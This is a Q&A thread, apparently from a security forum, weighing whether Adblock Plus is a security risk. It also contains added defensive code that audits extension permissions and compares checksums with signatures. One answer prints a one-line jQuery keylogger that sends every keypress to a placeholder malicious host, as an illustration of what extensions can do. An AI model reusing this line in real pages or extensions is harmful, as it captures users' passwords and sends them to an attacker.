Is Adblock (Plus) a security risk?

  • My email-provider's website (http://www.gmx.de) recently started linking to the (German) site http://www.browsersicherheit.info/ which basically claims that due to its capabilities to modify a site's appearance, Adblock Plus (and others) might actually be abused for phishing. Here's a quote from that site plus its translation:

    Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben – auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

    translated:

    Such addons can access all your browser's input and can also forward them to third parties - even your banking password. This can happen on all websites. Security mechanisms such as SSL cannot avoid that.

    Ok, they mention other (pretty obviously crapware) addons, but is Adblock Plus really a security threat or do that site's operators simply use the opportunity to try and scare inexperienced users into viewing their ads again?

    This boils down to: Don't run any applications you don't trust. If Adblock were evil, it could steal your login data. If any other executable you run were evil it could do so as well.

    Just for humor's sake: Why don't you use Ghostery? ;-)

    Can you clarify the question? Are you asking if Addons like Adblock could _theoretically_ be a security risk, or are you asking if Adblock is _currently_ a security risk?

    @MooingDuck Good point - I'm asking about _currently_, since theoretically that should be clearly possible, right?

    I wonder how many users started using Adblock Plus after reading all the articles about this? Some entities should really consider the Streisand effect before starting a blackmail campaign.

    **Update:** The FUD-site admins (or Adblock itself :) meanwhile removed the adblockers from the list of "bad-ons" (oh dear, that word-creation alone makes me think of B-movies). In addition, Adblock now offered me the option to hide FUD-banners on GMX's homepage. Guess that's not exactly the effect they hoped for...

    To be fair, there's been a large number of malware adblock clones in the Chrome webstore. I've reported a few before and eventually got them taken down but have given up now. Some went as far as copying the exact descriptions and icons from the legitimate adblock extensions to get hits. You couldn't tell the difference between `Adblock` and `Adb1ock`. Then with all the fake 5-star ratings... it's hard to tell what is actually legitimate. Just look at all the "Adblock for XXX" extensions that claim to work and all the comments that state otherwise. Just be smart about what you download people.

    @JeffMercado Isn't that a serious problem with Chrome's webstore then? I don't remember such BS happening at Mozilla...

    It is, definitely. I'm just saying, people can be misled to think that these clones come from the makers of the legitimate adblock versions. They might think that clone adblock was a scam so all of adblock (clone or not) are scams. It's possible that someone at GMX got burned by this and without really researching this, pushed for this campaign.

    It is open source software after all, that should kill this issue once and for all.

    Conversely, Adblock is a form of security. Before installing it on Android, I was bombarded with ads prompting me to install an advertiser's app.

    @TheRookierLearner could you expand on Ghostery, please?

    @Federico Basically it shows and lets you block any tracking, adding and nagging parts of websites: https://www.ghostery.com/

    Tobias, I know and I use it, I was asking because the question of @TheRookierLearner seemed sarcastic and I couldn't understand.

    @Federico I think their point was to mockingly suggest using another addon to check how trustworthy adblock is, which merely delegates one's trust from adblock to ghostery...

    @Federico - Ya, I am indeed suggesting another add-on. On a different note (about the point that there are multiple add-ons), if you search Google Web Store of extensions for "adblock" you'd get many results like "adblock pro", "adblock premium", "adblock plus" (and the list goes on) and you don't know which is the legit one. Search for "ghostery" on the other hand, you get only one extension. I'm not a fan of ghostery but for some reason it doesn't seem to have multiple copy extensions (and doesn't add to confusion which "adblock" creates)

    For the sake of answer, I just went to Ghostery's website and found this: Also, its website clearly states: `Ghostery does not collect any data by default. You may choose to send us data by enabling the Ghostrank feature.` (more in their privacy statement, EULA and FAQs). Again, I just want to assert that I'm not Ghostery's fan or promoter (in fact it sometimes breaks some pages and doesn't block the ads on YouTube) but it doesn't have the confusion (or other crap like "accessing user input") as is the case with other ad-blockers.

    I just thought it's important to share this. After using adblock plus I had malware issues. I had adblock installed on my android. I've had my phone for over a year with no issues. After using adblock I would get a popup to adcasch site every time I unlock my screen. It was very suspicious because it appears in my phone's default browser which I never use. I only ever use a third party installed Chrome. I have an anti virus on my phone. It scanned and found no threats. I suspected ad block as it was the last app I downloaded that gave so many permissions to the app. I disabled the app within my

    At best this is anecdotal evidence. Are you sure that you installed The real AdblockPlus from adblockplus.org? This isn't really an answer (yet).

    Just sharing: I stopped using Adblock Plus because it consumed too much resources on my computer at the time. Now I'm always using my custom VPN, so I made it also be a DNS server, and resolve the known ad and tracking hosts to `0.0.0.0`. Problem solved: ads and tracking unobtrusively disabled on the network level on all my devices configured to use this VPN.

  • Andalur (Correct answer, 7 years ago)

    It is not. This is a FUD (fear, uncertainty, and doubt) campaign by GMX because they want to display their ads. There is absolutely no security risk from the mentioned ad blockers. They added some crapware to the list to make it look more legitimate.

    Of course such campaigns are very unusual, especially from such a big and well known company like GMX. Unfortunately, I have no English source at hand (because it's a German only campaign) but since you speak German you may want to read this article at heise.de.

    Update #1: United Internet, the company behind GMX, received a lot of criticism for misleading customers by falsely claiming that there is a security risk on their PC. The Wall Street Journal (German edition) named the warnings displayed on GMX and the site they link to a "scare campaign".

    Update #2: GMX now says that they will no longer display the link when you use ad blockers but will still display it if you use crapware that injects adverts, the list at the site http://www.browsersicherheit.info/ has been updated accordingly and now lists only a small collection of crapware. This list is by no means complete so it is not a reliable source when you want to know if your browser has crapware installed. However, United Internet still maintains its position that they do not want users who visit their sites to use ad blockers and said they will develop other anti-blocking methods in the future (German source).

    Thanks for the link, it basically boils down to your answer and goes on to explain that this campaign is not surprising after the announcement of suing Eyeo due to their "Acceptable Ads" feature (link in German, too) - apparently the FUD is based on a Chrome incident

    Who do you trust more? ABP (which is under constant scrutiny and would be steam rolled if it replaced mybank.com with something else) or Some Random German Company? COULD an addon be used for `Evil Purposes`? Of course... but without proof it's just blind accusations and FUD.

    @WernerCD GMX is a major email provider, one of the top non-gmail providers. It's not "some random German company". And, of all the countries, a *German* company is the one you decide to mistrust?

    @Superbest GMX and other German e-mail providers also run the "E-Mail made in Germany" campaign where they mislead customers into thinking that mails sent over their mail servers are safe from surveillance.

    @Superbest Well... if it isn't an American company, then it is some other random company. .. ... I jest I jest. But seriously, I would say the same for most companies - and would say the same if Comcast or Google told me to stop using ABP. You have to raise an eyebrow when a company that profits off of advertisements tells you to stop using an ad blocker.

    It's really kind of dishonest to say that there's ***no*** risk. However, the risks are small enough that I do agree that this is nothing more than a FUD campaign.

    The company behind AdblockPlus (Eyeo) is quite dubious [1], so warning users in general could be reasonable. Nevertheless, addons like Adblock Edge [2] that use (as far as I know) only open source code based on the original Adblock seem to be more safe. So by looking at the design of the warning message, I also agree that this is mainly a perky FUD campaign intended to increase their ad revenues again. [1] http://www.mobilegeeks.de/adblock-plus-adblockgate-eyo-gmbh/ [2] https://addons.mozilla.org/de/firefox/addon/adblock-edge/

    @Superbest "_It's not "some random German company"._" But ADB is known worldwide (like Google). A scandal involving ADB would be great news for the world.

    A FUD campaign of this magnitude may be "unusual", but sites saying anything and everything they can to get their ads displayed is hardly a recent phenomenon. Some small, independent sites detect adblocking, and politely request that you disable it on their site because they rely on ad revenue. And then there are major corporate sites like www.denverbroncos.com, which displays a banner claiming "We noticed that you may have an Ad Blocker turned on. Please be aware that our site is best experienced with Ad Blockers turned off." without ever justifying that dubious claim. "Best" for WHOM?

    FUD can be true! It really is a risk. Third party software can do a lot if not everything (maybe through a hack you expose yourself to) on your computer. A small risk given what's happening. And because it's such a small risk it's FUD. But FUD can be true.

  • Update

    After thinking it over, I have to agree with the other answers in that, despite the fact that it CAN access your data, Adblock is more likely to protect your privacy than invade it. The real risk is malicious ads that prompt you to install software on your computer. Adblock prevents these.

    Below is the original, cautionary answer:

    Yes, it totally is.

    Adblock Plus is a browser extension/add-on developed by an independent developer. Adblock can access the DOM (document object model) on all pages.

    The way AdBlock works is that it injects script into your browser, which searches the DOM, and then runs a hide() function on what it determines are ads.

    That means AdBlock (and any Chrome extension with that permission) can access your DOM. Adblock cannot access JavaScript variables.

    What does this mean?

    If you are on a website with secure authentication, and there is a JavaScript object with something private like an AuthKey, you are safe. AdBlock cannot access JavaScript variables.

    However, AdBlock CAN run code equivalent to this.

    $(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

    Which essentially will route any keys you press to a remote server.

    This can be used to steal your password which is even worse than stealing your token.

    That Being Said, Is AdBlock itself Dangerous?

    It seems to me that AdBlock is not overly dangerous as the developer has identified himself and it is used by millions of people. If it was doing the kind of trickiness as above, someone would have likely noticed and blown the whistle.

    But don't think Chrome Extensions are totally safe. All of them can steal any data, as well as other malicious things.

    What Else Can It Do?

    A Chrome Extension can also perform the following security violations quite trivially...

    • Route the content of any email or page you read to a third-party source (if this email contains unencrypted login information, you are busted). If you can see it on the screen, so can any Chrome Extension, no questions asked.
    • Enter information into a field and press the submit button, for example, send an e-mail
    • If you leave your browser open, and the extension knows how, it can use your email interface (Gmail, Outlook) to send e-mail of its choosing to your contacts. This is trivial.
    • Change the script associated with any button, if that was originally put in with jQuery. For example, the button that sends your sign-in information to the server can be changed slightly to send that information to both the server and http://mymaliciousserver. This is trivial.

    Update

    It has been verified through discussion that AdBlock is open source. This should let you trust AdBlock more, but remember it is still capable of doing those things. I've reviewed the source and I can safely say I haven't any idea at all what's going on.

    Source: I am a JavaScript and Chrome Extension developer.

    This is only about one ad blocker... There are many different ad blockers in the list, and they use many different methods of blocking I think...

    If it's a Chrome Extension, and you allow it to access your data on all pages, then it can do all those things. Almost all Chrome Extensions ask for this permission, and with AdBlocker it's required even to work, if you think about it.

    Wasn't AdBlock Plus open source? (;

    @FranciscoPresencia Link Please?

    Great answer about the _potential_ of addons, though slightly too fear-inducing title IMHO (I'm using Firefox btw, but I guess almost the same applies there)

    Up-vote for both a good answer (whether or not an application will do it, this is the information security stackexchange and such questions deserve detailed answers) and for the name... what was in the box?

    The link has already been posted by @TobiasKienzler. Also, a hint was the big green sign in the main page that said *Open Source*.

    @TobiasKienzler This is awesome. Excuse me while I fork AdBlock and begin my project of AdTeese, which replaces every ad with a sized pin-up of Dita von Teese.

    "open-source" means nothing if the source you're looking at is not the same source as the extension uses. I have published the Chrome extension source viewer that allows one to view the real source of an extension (= the one that is going to be used when you install an extension). Of course, you have to trust that the extension does what it promises, i.e. display correct source code instead of some censored one. It all boils down to "only install software from publishers you trust".

    @itcouldevenbeaboat Please do, I would use it :-)

    @TobiasKienzler It looks like Firefox has a stricter review process which seems to have a greater focus on manual reviews. Of course, it's not foolproof (and comes with longer update times while waiting for approval), but it might be more than Chrome does - Google's not very explicit about how they review.

    There is no such thing as a "*JavaScript object with something private*" - unless it's useless. Even if a plugin does not access local variables, once it has access to the page (DOM, script injection) it can compromise everything that happens with JS, as all side-effect interfaces are public.

    This is a great quotation that could apply to most software: "I've reviewed the source and I can safely say I haven't any idea at all what's going on."

    @Bergi Actually, Google Chrome Extensions run in a VM Sandbox, and can't access JavaScript variables on the page by any means I know of.

    @itcouldevenbeaboat an extension can use a content script to inject a script element into the dom, which will run in the webpage javascript context.

    @itcouldevenbeaboat Content scripts are *not* run in a virtual machine. The JavaScript execution contexts are indeed separated, but the DOM is shared. Consequently, content scripts can run code in the context of the web page by inserting script tags, running event handlers, etc.

    @RobW This is interesting. Can you describe a way of accessing a window variable on a page, say, `myVariable`, from a Chrome Extension, and I'll check it out?

    @itcouldevenbeaboat See answers and linked answers at http://stackoverflow.com/q/9515704

    Can it insert tags? Or <iframe> tags? Can eventhandler code access variables? Can in some way the JS variables be exposed?

    *"I've reviewed the source and I can safely say I haven't any idea at all what's going on. Source: I am a JavaScript and Chrome Extension developer."* So you are a developer who cannot read code? Either that, or you only looked at the code for 40 seconds without reading it. Either way, good job of trying to scare users, you've successfully made it into the FUD ranks of GMX. Do you also happen to work in the advertisements industry?

  • This really comes down to an issue of trust. It is true that today, the AdBlock extension is safe. We know that it will not steal your data, even though—as the other answers point out—it has the technical ability to do so.

    However, Chrome extensions are silently and automatically updated.

    Do you trust that the developer of the AdBlock extension will not add malicious code? I personally do – with millions of users, malicious code would be noticed quickly and would undoubtedly be a career killer for the developer.

    Even if you do trust the developer, there are still unlikely scenarios that could expose you:

    For the paranoid, these issues could be mitigated by:

    • Only logging in to sensitive sites (i.e. banking) using Incognito mode (where extensions are disabled by default).
    • Disabling automatic extension updates, but you obviously lose a lot of convenience.

    So while it is intellectually dishonest to say, "no, there is no risk," the risk is completely overblown by GMX. Just as I trust Google to give me a browser that does not steal my personal data, I trust the AdBlock developer to give me an extension that does not steal my data.

    The risk of the extension being updated with malicious code is small enough that I don't worry about it, and if I did have the slightest concern, it's easy enough to disable the extension.

    "Trust Google to give me a browser"... stunned by the fact that the words "Google" and "trust" are used in one sentence.

    Good points indeed - the same applies for Firefox of course

    Hahaha - I trust google to provide a browser that does steal my data, but at least I have a reasonable idea of all the things they will do with my data, and I have currently bought into that model and manage that data set accordingly.

    Well... the *browser* itself won't steal your data; of course, the services that come with it are another story. Don't sign the browser into a Google account and uncheck all the boxes in the Privacy settings (or use Incognito), and you won't leak anything to Google. The same applies with Firefox and IE.

    There have already been cases where developers of chrome extensions have sold their IP to another party who has not had the same ethics, security precautions etc. This is not to say AdBlock is a risk. It just emphasises that when you use an extension, you need to recognise that the situation can change and something you trusted and were confident about may end up evolving into something less trustworthy.
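An added example, not part of the original answers or of any extension's own code: the two answers above note that an extension granted access to all pages can read and change every DOM, and that updates arrive silently. This sketch reads the standard manifest keys (`permissions`, `host_permissions`, `content_scripts`) and lists what an update adds; the manifests and function names are constructed for a hypothetical extension.

```javascript
// Match patterns that cover every site the user visits.
const ALL_SITES = /^(<all_urls>|(\*|https?):\/\/\*\/\*)$/;

// Everything a manifest requests, as one flat set of strings.
// Manifest V2 puts host patterns in "permissions"; V3 uses "host_permissions".
function requestedAccess(manifest) {
  const access = new Set([
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ]);
  for (const cs of manifest.content_scripts || []) {
    for (const pattern of cs.matches || []) {
      access.add(`content_script:${pattern}`);
    }
  }
  return access;
}

// True when the extension can read and change the DOM of any page.
function canTouchEveryPage(manifest) {
  return [...requestedAccess(manifest)]
    .some(a => ALL_SITES.test(a.replace(/^content_script:/, '')));
}

// Access requested by the updated manifest but not by the installed one.
function accessAddedByUpdate(installed, update) {
  const before = requestedAccess(installed);
  return [...requestedAccess(update)].filter(a => !before.has(a)).sort();
}

// Constructed sample manifests (hypothetical extensions, not real ones).
const installedManifest = {
  manifest_version: 2, name: 'Sample Blocker', version: '1.0.0',
  permissions: ['storage', 'webRequest', 'webRequestBlocking', '<all_urls>'],
  content_scripts: [{ matches: ['http://*/*', 'https://*/*'], js: ['hide.js'] }],
};
const updatedManifest = {
  ...installedManifest, version: '1.0.1',
  permissions: [...installedManifest.permissions, 'cookies', 'history'],
};
const singleSiteManifest = {
  manifest_version: 3, name: 'Sample Helper', version: '0.1',
  permissions: ['storage'],
  host_permissions: ['https://intranet.example/*'],
  content_scripts: [{ matches: ['https://intranet.example/*'], js: ['helper.js'] }],
};

console.log('all-page access:', canTouchEveryPage(installedManifest));
console.log('added by update:', accessAddedByUpdate(installedManifest, updatedManifest));
```

An empty result from `accessAddedByUpdate` does not mean an update is harmless: once all-page access is granted, changed code needs no new permission, so the diff only catches scope growth.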

  • All software is a security risk, but in this case their claim is misleading.

    Just like all advice is potentially bad and all transactions are potentially fraudulent. "Risk" just means your security isn't guaranteed, which is true in 100% of cases.

    But in the case of AdBlock Plus, the software is well-understood and developed by a team that has a track record of protecting the interests of its users. Plus it's open-source, so the source code is available for you to examine yourself for any security issues. So in this case, the risk is minimal; trivial even.

    Instead, GMX is using a truism ("software is always risky") to suggest that this software is dangerous, which is misleading at best, and possibly defamatory. It's like a restaurant owner handing out leaflets saying his competitors could be poisoning their own food. Technically it's true, since you said "could be" instead of "are", but the action is fundamentally dishonest nonetheless.

    I just wish they were more honest as in "Please support our service by viewing our ads. Or else."

  • Just an observation - I tend to promote ad blockers especially for my less savvy friends and associates - precisely because it reduces security threats. How? Because much of the most malicious content on the web comes in the form of a misleading advertisement like "click here to make your pc faster"... These largely disappear with an ad blocker.

    followed by the "you seem to have a virus, download 'anti'-virus now" - best reason why someone clicked this: "It didn't go away after clicking 'no', so I chose 'ok'" m-/

    If a site said "Please don't use an ad blocker on this site; they help us pay the bills and we promise not to sell ad space to any malicious content." I'd feel obliged to turn my ad blocker off on that site.

    Exactly, that's what I do on the entire SE network

    I'm not using adblockers, as I know it helps pay the bills on most sites I'm visiting. I would love to have a partial ad-blocker, which would only block ads that are known to be malicious. I'm also fine with obtrusive ads (flash, gif, videos, etc.), that are not malicious, just trying to grab attention, so Adblock Plus's lesser filter is still not okay for me.

  • Adblock (as other extensions and, for that matter, browser developers) has the technical ability to get a lot of your data, and you have all the risks commonly associated with running third-party applications - namely, that the vendor can be malicious, and there may be bugs in their software that break your security.

    That being said, I'd consider AdBlock as a defence against phishing. A lot of questionable software gets pushed to users through ads masquerading as something else - i.e., a site offers some item that a user wants, but has an ad that looks like a download button, and delivers some adware/malware product instead of the actual content on site, and such 'accidentally' downloaded malware is a serious security risk. Similarly, there have been incidents of mass consumer attacks by running an ad banner containing a zeroday exploit, which would cause the exploit to appear on respected, well trusted sites.

    For company-wide security practices, it may make sense to require AdBlock and install it by default on every workstation - since it is especially useful to protect the inexperienced users who wouldn't install it themselves. This would cause a risk by trusting one more software product, but would be a net positive for everyday security.

    interesting point, though for company-wide use I'd consider using a local fork that gets updated only after a sufficiently thorough review of the changes made

    Yes, a trusted&verified fixed version is great - again, that's just treating adblock risks exactly as you should treat any other commonly installed software and its upgrades.

  • The way this information is spread by United Internet is misleading (I am trying hard to avoid saying "libel"). The allegation as it stands is clearly wrong by all objective means, and the presentation is defamatory.

    Of course, in principle, one has to admit that Adblock (Plus) is of course a potential security risk. Whether this risk warrants a reasonable concern is another thing.

    Adblock (Plus) might be a security risk for three reasons:

    1. It is software that runs on your computer, which could, like all software, in principle do almost anything. Including showing false information or stealing your data.
    2. It does modify web page contents, that is what blocking ads is about. Certainly, a software which is well-known to modify the contents of web pages could modify the contents in a malicious way and go unnoticed much easier than another software.
    3. It performs this task by matching a downloadable list of regular expressions from a range of (uncontrolled/unknown) third parties, such as EasyList

    So, if you are in ultra-paranoia mode, you might fear that either someone at EasyList (or another filter list provider) modifies the filter list so they do something malicious, or a hacker hijacks the site. Your Adblock Plus addon would presumably download the malicious list during its daily/weekly update without knowing and without a means of verification (there is a checksum that can be embedded, but this only protects from accidental corruption, not malicious modification).
    As a result, such a malicious block list could in theory cause the addon to do "evil things".

    Luckily, apart from JS exploits, there is not too much harm that could realistically be done via this attack vector due to the way Adblock works (it will match an arbitrary regex, but it won't do arbitrary substitutions, so hiding some elements it shouldn't hide or letting some ads through is pretty much the worst possible case).
    On the other hand, a JS exploit could be used against you without Adblock Plus running in the first place.

    Also, obviously, like any third party software (including Firefox or Chrome itself!) the Adblock Plus addon itself could steal your data. All you can say at the present time is that so far this has not happened.
    Then again, almost all of the big commercial players in the business are doing untrustworthy things on a daily basis, which nobody objects against.

    Now you have to ask yourself how likely it is that Adblock Plus will indeed steal user data, and how likely it is that such a thing would go undetected for longer than a day or two on a widely-deployed open-source project.

    Frankly, if you believe that this is a serious and realistic threat which is likely to affect you, then you must also believe that Microsoft, in collaboration with the NSA, already builds identity theft functionality right into Windows and that every computer has a secret "kill switch" which the US DoD can activate at will (that too, is in principle possible, and it's actually more likely to be true than the author of Adblock stealing your savings).

    You should not trust GMX either in this case, since they will (note the wording, will, not may) share all your personal data and traffic information in a malicious and unethical way with other parties (at least with US agencies, due to Schröder's 2001 treaty, but you have no way of telling with whom else).
    You also shouldn't trust 1&1 (another member of United Internet) because they will share your personal data with who-knows-whom (being a US-based company). Nor Google, nor the other half of the internet for that matter.

    On the other hand, Adblock Plus has demonstrably prevented malware from being installed on users' computers in the past.
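An added example, not from the original answer or from Adblock Plus itself: the answer above says an embedded checksum guards a filter list against accidental corruption but not against deliberate modification. The sketch below shows why, using a simplified `! Checksum:` header modelled on Adblock Plus style lists and, as an assumed alternative, an Ed25519 signature checked against a key the client already holds; the list contents and function names are constructed.

```javascript
const crypto = require('node:crypto');

// Constructed sample list; the checksum normalisation here is simplified.
const RULES = [
  '[Adblock Plus 2.0]',
  '! Title: Sample list (constructed)',
  '||ads.example^',
  '##.banner-ad',
];
const CHECKSUM_PREFIX = '! Checksum: ';

// Unkeyed digest over the list body (everything except the checksum line).
// Anyone who can edit the list can also recompute this value.
function bodyDigest(lines) {
  const body = lines.filter(l => !l.startsWith(CHECKSUM_PREFIX)).join('\n');
  return crypto.createHash('md5').update(body, 'utf8')
    .digest('base64').replace(/=+$/, '');
}

function withChecksum(lines) {
  const out = lines.filter(l => !l.startsWith(CHECKSUM_PREFIX));
  out.splice(1, 0, CHECKSUM_PREFIX + bodyDigest(out));
  return out;
}

function checksumValid(lines) {
  const line = lines.find(l => l.startsWith(CHECKSUM_PREFIX));
  return line !== undefined &&
    line.slice(CHECKSUM_PREFIX.length) === bodyDigest(lines);
}

// Assumed alternative: the publisher signs the list, and the client verifies
// with a public key it obtained out of band (for example, shipped with the client).
const { publicKey, privateKey } = crypto.generateKeyPairSync('ed25519');

function signList(lines, key) {
  return crypto.sign(null, Buffer.from(lines.join('\n'), 'utf8'), key);
}

function signatureValid(lines, signature, key) {
  return crypto.verify(null, Buffer.from(lines.join('\n'), 'utf8'), key, signature);
}

function checksumVersusSignature() {
  const published = withChecksum(RULES);
  const signature = signList(published, privateKey);

  // Accidental corruption: one rule damaged, checksum line left as it was.
  const corrupted = published.map(l => (l === '##.banner-ad' ? '##.banner-a' : l));

  // Deliberate modification at the download source: a rule is added and the
  // checksum is recomputed over the new body, so the checksum still matches.
  const modified = withChecksum([...RULES, '##.not-an-ad']);

  return {
    publishedChecksum: checksumValid(published),   // true
    corruptedChecksum: checksumValid(corrupted),   // false
    modifiedChecksum: checksumValid(modified),     // true
    publishedSignature: signatureValid(published, signature, publicKey), // true
    modifiedSignature: signatureValid(modified, signature, publicKey),   // false
  };
}

console.log(checksumVersusSignature());
```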

  • The other answers forget to mention the issue aside from trust: That adblock is modifying pages you visit. This and having to trust more developers is why I have never used ad blocking software/browser plugins, and strongly recommend against it.

    It is well known that websites depend on all kinds of fragile invariants for security. For example, just look at the ways clickjacking has been addressed in the past. There is nothing stopping adblock from mistakenly violating an invariant that the site depends on for security.

    Also adblock and other ad blocking software decrease anonymity. An adversary can either make you run code to browse the DOM tree and look for missing parts / alterations, or passively observe that you aren't making certain requests to fetch ad-related content (some of which may be hosted on the site itself, making it a possible adversary).

    How many people use Adblock* with EasyList and no other filters?

  • Something no-one has mentioned here is that Adblock plus along with almost all other browsers and extensions can be updated remotely. This means there must be a backdoor in the program even if it is locked down to specific "trustworthy" update URLs. This could be interpreted as spyware, but spyware is a somewhat abstract term.

    It's true that most people have said it is not safe as it has permissions to read and send data although it's widely accepted that Adblock plus in particular is not malicious. Despite for the most part being open source (Adblock included) browser software and extensions are only as secure as the update URLs for which there is no way of knowing how secure they actually are as the code for these services is remote and therefore not accessible.

    Obviously no software or server can be 100% secure due to entropy and having users, but to obtain the highest possible security you should study the source code, always build from source and disable automatic updating. Like with all software, browsers and extensions are only as secure as the user makes them.

    *"Something no-one has mentioned here is that Adblock plus along almost all other browsers and extensions can be updated remotely."* Read again; this has been mentioned.

    Oh sorry, my mistake. I assumed so since your post is more towards the bottom than the one that originally mentioned it (oftentimes posts are very roughly in chronological order), but of course I should have checked. I stand corrected :)

License under CC-BY-SA with attribution


Content dated before 6/26/2020 9:53 AM